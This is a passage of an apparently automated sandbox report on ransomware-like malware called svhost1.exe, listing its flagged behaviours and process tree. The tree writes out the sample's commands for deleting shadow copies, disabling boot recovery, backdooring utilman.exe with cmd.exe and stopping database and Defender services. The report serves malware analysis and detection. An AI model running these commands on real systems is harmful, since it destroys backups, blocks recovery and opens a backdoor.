SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: 
SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemProfilePrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeProfSingleProcessPrivilege 1608 WMIC.exe Token: SeIncBasePriorityPrivilege 1608 WMIC.exe Token: SeCreatePagefilePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeDebugPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeRemoteShutdownPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: 33 1608 WMIC.exe Token: 34 1608 WMIC.exe Token: 35 1608 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemProfilePrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeProfSingleProcessPrivilege 1608 WMIC.exe Token: SeIncBasePriorityPrivilege 1608 WMIC.exe Token: SeCreatePagefilePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeDebugPrivilege 1608 WMIC.exe Token: 
Drops file in Program Files directory 100 IoCs
Drops file in Windows directory 56 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
596 powershell.exe
984 powershell.exe
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process
2024 bcdedit.exe
1968 bcdedit.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
description   ioc   Process
Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer   vssvc.exe
Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer   vssvc.exe
Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}   vssvc.exe
Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer   vssvc.exe
Key created   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer   vssvc.exe
-
Drops desktop.ini file(s) 3 IoCs
description   ioc   Process
File opened for modification   C:\Program Files\desktop.ini   svhost1.exe
File opened for modification   C:\Program Files (x86)\desktop.ini   svhost1.exe
File opened for modification   C:\$Recycle.Bin\S-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini   svhost1.exe
-
Sets file execution options in registry 2 TTPs 4 IoCs
description   ioc   Process
Key created   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe   reg.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled"   reg.exe
Key created   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe   reg.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe"   reg.exe
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process
660 net.exe
Processes

C:\Users\Admin\AppData\Local\Temp\svhost1.exe
"C:\Users\Admin\AppData\Local\Temp\svhost1.exe" 1⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Drops file in Windows directory
- Drops desktop.ini file(s)
PID:1100

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -Command - 2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  PID:596

    C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" view 3⤵
    - Discovers systems in the same network
    PID:660

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -Command - 2⤵
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  PID:984

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE 3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1068

    C:\Windows\system32\vssadmin.exe
    "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet 3⤵
    - Interacts with shadow copies
    PID:1616

    C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe 3⤵
    - Sets file execution options in registry
    PID:1608

    C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled" 3⤵
    - Sets file execution options in registry
    PID:1620

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice 3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1704

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice 3⤵
    PID:1892

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice 3⤵
    PID:1840

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice 3⤵
    PID:1916

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice 3⤵
    PID:1264

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice 3⤵
    PID:540

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice 3⤵
    PID:2036

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice 3⤵
    PID:2012

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice 3⤵
    PID:1452

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice 3⤵
    PID:1480

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice 3⤵
    PID:1308

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice 3⤵
    PID:276

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice 3⤵
    PID:432

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice 3⤵
    PID:216

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice 3⤵
    PID:1500

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice 3⤵
    PID:1592

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice 3⤵
    PID:1192

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice 3⤵
    PID:1572

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice 3⤵
    PID:1880

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice 3⤵
    PID:1840

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate 3⤵
    PID:1916

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate 3⤵
    PID:1264

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate 3⤵
    PID:540

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate 3⤵
    PID:2036

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate 3⤵
    PID:2012

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate 3⤵
    PID:1456

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate 3⤵
    PID:596

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate 3⤵
    PID:528

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate 3⤵
    PID:204

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate 3⤵
    PID:1488

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate 3⤵
    PID:1580

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate 3⤵
    PID:1608

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate 3⤵
    PID:1560

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate 3⤵
    PID:1848

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate 3⤵
    PID:1888

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate 3⤵
    PID:1924

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate 3⤵
    PID:1980

    C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate 3⤵
    PID:576

    C:\Windows\system32\bcdedit.exe
    "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text 3⤵
    - Modifies boot configuration data using bcdedit
    PID:2024

    C:\Windows\system32\bcdedit.exe
    "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text 3⤵
    - Modifies boot configuration data using bcdedit
    PID:1968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe 1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1784